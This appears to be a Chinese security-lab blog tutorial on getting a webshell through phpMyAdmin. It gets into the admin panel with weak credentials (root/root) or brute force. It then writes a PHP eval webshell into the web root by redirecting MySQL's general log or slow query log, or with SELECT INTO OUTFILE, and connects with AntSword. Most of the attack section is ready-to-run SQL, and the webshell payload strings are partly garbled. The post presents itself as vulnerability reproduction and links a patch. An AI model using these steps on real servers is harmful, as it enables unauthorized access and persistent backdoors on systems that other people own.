从PhpMyAdmin到getshell实践

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。

phpMyAdmin跟其他PHP程序一样在网页服务器上执行，可以在远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。

在通过对目标进行信息收集、目录扫描后，发现存在phpmyadmin后台，可通过弱口令（可以直接尝试下账号root密码root）或者暴力破解进入管理后台。分享一些真实环境中常用到后台getshell的方法。

0x02测试版本

访问/phpMyadmin/README

0x03漏洞复现

1.访问漏洞环境

2.通过工具对phpMyadmin平台进行暴力破解，成功登录后台，存在弱口令 root/root

成功登录到后台

方法1

1.利用条件为有操作权限

2.查看配置

show variables like '%general%';

‍

3.开启general log模式

set global general_log = on;

4.设置日志目录为shell地址（绝对路径通过phpinfo获取）

set global general_log_file = 'C:/phpStudy/WWW/tm.php';

5.写入shell内容，将记录到日志

select '



 eval($_POST[cmd]);?>'

6.成功写入文件，中国蚁剑成功连接。

方法2

1.查看配置

show variables like '%slow%';

2.修改日志文件绝对路径及文件名，（绝对路径通过phpinfo获取）

set global slow_query_log_file = 'C:/phpStudy/WWW/mt.php';

3.启用慢查询日志

set GLOBAL slow_query_log=on;

4.通过慢查询写shell

select '



' from mysql.db where sleep(10);

5.成功写入文件，中国蚁剑成功连接。

方法3

• 对web目录需要有写权限能够使用单引号

• 知道绝对路径

• secure_file_priv没有具体值

2.查看有没有配置secure_file_priv

show global variables like '%secure%';

注意：

secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。如下关于secure_file_priv的配置介绍

• 1、secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出

• 2、当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下

• 3、当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

这里为nulll，所以没有写权限

这里演示通过获得shell修改文件修改secure_file_priv 的值为空，在mysql/my.ini中查看是否有secure_file_priv 的参数，如果没有的话我们就添加 secure_file_priv = '' ，重启服务器即可。

select '



' into outfile 'C:/phpStudy/WWW/yz.php';

3.成功写入shell，中国蚁剑成功连接。

通过包含sedsion文件的方法来getshell

因环境问题，请参考

https://www.cnblogs.com/0nc3/p/12071314.html

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来